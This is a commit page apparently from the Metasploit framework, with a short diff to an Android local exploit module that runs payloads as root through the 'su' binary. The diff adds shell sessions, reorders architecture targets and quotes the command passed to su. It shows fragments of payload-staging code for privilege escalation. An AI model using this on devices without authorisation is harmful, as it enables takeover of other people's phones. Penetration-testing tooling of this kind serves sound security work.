add android module to run payloads with su

rapid7 · May 6, 2018 · 19eb867 · 19eb867
1 parent 37530f0
commit 19eb867
Showing 1 changed file with 4 additions and 7 deletions.
diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb
@@ -17,12 +17,12 @@ def initialize(info={})
       },
       'License'        => MSF_LICENSE,
       'DisclosureDate' => 'Aug 31 2017',
-      'SessionTypes'   => [ 'meterpreter' ],
+      'SessionTypes'   => [ 'meterpreter', 'shell' ],
       'Platform'       => [ 'android', 'linux' ],
-      'Arch'           => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+      'Arch'           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
       'Targets'        => [
-        ['armle',  {'Arch' => ARCH_ARMLE}],
         ['aarch64',{'Arch' => ARCH_AARCH64}],
+        ['armle',  {'Arch' => ARCH_ARMLE}],
         ['x86',    {'Arch' => ARCH_X86}],
         ['x64',    {'Arch' => ARCH_X64}],
         ['mipsle', {'Arch' => ARCH_MIPSLE}]
@@ -37,9 +37,6 @@ def initialize(info={})
   end
 
   def exploit
-    arch = cmd_exec("getprop ro.product.cpu.abi")
-    print_status("Arch: #{arch}")
-
     linemax = 4088 - datastore['SU_BINARY'].size
     execute_cmdstager({
       flavor: :echo,
@@ -52,7 +49,7 @@ def exploit
   end
 
   def execute_command(cmd, opts)
-    su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}"
+    su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'"
     cmd_exec(su_cmd)
   end